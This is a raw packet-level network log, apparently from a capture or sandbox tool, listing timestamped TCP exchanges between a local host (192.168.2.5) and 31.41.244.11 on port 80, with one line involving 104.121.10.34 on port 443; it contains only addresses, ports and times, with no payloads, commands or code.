Dec 17, 2024 06:03:24.165884018 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.165930033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.166560888 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.166616917 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.166693926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.167051077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.167659044 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.167781115 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.167828083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.167828083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.168786049 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.168884993 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.168929100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.168929100 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.169902086 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.169996977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.170020103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.170151949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.171015978 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.171077967 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.171117067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.171343088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.172257900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.172374010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.172540903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.172540903 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.173234940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.173357010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.173389912 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.173602104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.174361944 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.174475908 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.174484968 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.174593925 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.175581932 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.175679922 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.175712109 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.175740957 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.176623106 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.176677942 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.176707029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.176820040 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.183327913 CET	443	49866	104.121.10.34	192.168.2.5
Dec 17, 2024 06:03:24.312236071 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.312362909 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.312367916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.312541008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.312728882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.312747955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.312800884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.312800884 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.313426971 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.313483953 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.313560009 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.313867092 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.314383984 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.314522982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.314533949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.314601898 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.315519094 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.315625906 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.315664053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.315733910 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.316643953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.316751003 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.316808939 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.316939116 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.317701101 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.317749977 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.317979097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.318022966 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.318800926 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.318938017 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.318963051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.319194078 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.320075035 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.320092916 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.320281029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.320281029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.321185112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.321204901 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.321291924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.321291924 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.322174072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.322223902 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.322304010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.322355032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.323390007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.323497057 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.323575974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.323637962 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.324506998 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.324562073 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.324634075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.324677944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.325465918 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.325544119 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.325598955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.325643063 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.326778889 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.326797962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.326934099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.326934099 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.327805996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.327869892 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.327927113 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.328057051 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.328862906 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.328994036 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.329041004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.329041004 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.330530882 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.330606937 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.330791950 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.330866098 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.331707001 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.331796885 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.331983089 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.332043886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.332536936 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.332555056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.332665920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.332665920 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.333376884 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.333394051 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.333431959 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.333451033 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.334419966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.334470034 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.334574938 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.334650993 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.335550070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.335640907 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.335694075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.335738897 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.336482048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.336605072 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.336682081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.336682081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.337599039 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.337713003 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.337742090 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.337769032 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.338716030 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.338830948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.338854074 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.338968992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.339848995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.339932919 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.339963913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.340049028 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.340945959 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.341047049 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.341351986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.341399908 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.342091084 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.342179060 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.342207909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.342264891 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.344588995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.344604969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.344620943 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.344638109 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.344662905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.344662905 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.344721079 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.348068953 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.348094940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.348113060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.348129988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.348135948 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.348160982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.348180056 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.348200083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.348200083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.348200083 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.348308086 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.349415064 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.349469900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.349651098 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.349698067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.350677013 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.350739002 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.350791931 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.350882053 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.351197004 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.351214886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.351285934 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.351286888 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.352197886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.352288961 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.352473974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.352535963 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.353426933 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.353501081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.353554010 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.353615999 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.354494095 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.354583979 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.354640007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.354693890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.355696917 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.355779886 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.355829000 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.355904102 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.356782913 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.356842041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.356918097 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.356982946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.358001947 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.358020067 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.358064890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.358064890 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.358747005 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.358845949 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.359091043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.359199047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.359215021 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.359333992 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.360244989 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.360354900 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.360408068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.360408068 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.361445904 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.361463070 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.361558914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.361558914 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.362488031 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.362576962 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.362616062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.362616062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.366848946 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.366868019 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.366894960 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.366924047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.366924047 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.366971970 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.366986036 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.366991043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.367044926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.367044926 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.367155075 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.367333889 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.368168116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.368215084 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.368345976 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.368397951 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.369376898 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.369422913 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.369535923 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.369637012 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.370448112 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.370500088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.370636940 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.370727062 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.507173061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507194996 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507213116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507230043 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507250071 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.507275105 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507292986 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507318974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.507318974 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.507329941 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.507457972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507661104 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.507905006 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.507956982 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.508743048 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.508794069 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.509098053 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.509159088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.510762930 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.510910988 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.510930061 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.510972023 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.511791945 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.511917114 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.511919975 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.511986971 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.512897968 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.513092995 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.513103008 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.513160944 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.513988972 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.514080048 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.514082909 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.514168024 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.515074015 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.515132904 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.515295982 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.515350103 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.516248941 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.516267061 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.516392946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.516392946 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.517240047 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.517343044 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.517565966 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.517616987 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.518466949 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.518485069 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.518625021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.518625021 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.519646883 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.519730091 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.519804955 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.519860029 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.520814896 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.520832062 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.520930052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.520930052 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.521363974 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.521379948 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.521414995 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.521430969 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.521469116 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.521560907 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.521624088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.521624088 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.522551060 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.522602081 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.522653103 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.522743940 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.523686886 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.523763895 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.523782969 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.523916006 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.524791002 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.524846077 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.524888992 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.524960041 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.525918007 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.525979042 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.526022911 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.526084900 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.527021885 CET	80	49850	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:24.527121067 CET	49850	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:24.527148008 CET	80	49850	31.41.244.11	192.168.2.5
